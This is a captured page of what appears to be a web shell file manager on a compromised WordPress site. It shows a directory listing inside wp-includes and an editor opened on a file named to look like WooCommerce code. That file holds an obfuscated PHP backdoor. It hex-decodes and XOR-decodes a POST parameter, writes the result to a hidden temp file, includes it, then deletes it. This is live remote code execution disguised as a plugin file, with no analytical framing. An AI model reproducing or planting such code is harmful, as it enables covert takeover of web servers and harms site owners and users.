📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: woocommerce.functions.php
<?php if(count($_POST) > 0 && isset($_POST["\x72ecord"])){ $ref = array_filter(["/var/tmp", getcwd(), getenv("TMP"), "/dev/shm", getenv("TEMP"), "/tmp", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $descriptor = hex2bin($_POST["\x72ecord"]); $property_set= '';$w = 0; while($w < strlen($descriptor)){$property_set .= chr(ord($descriptor[$w]) ^ 46);$w++;} $val = 0; do { $flag = $ref[$val] ?? null; if ($val >= count($ref)) break; if ((bool)is_dir($flag) && (bool)is_writable($flag)) { $ptr = vsprintf("%s/%s", [$flag, ".token"]); $success = file_put_contents($ptr, $property_set); if ($success) { include $ptr; @unlink($ptr); die();} } $val++; } while (true); }
Save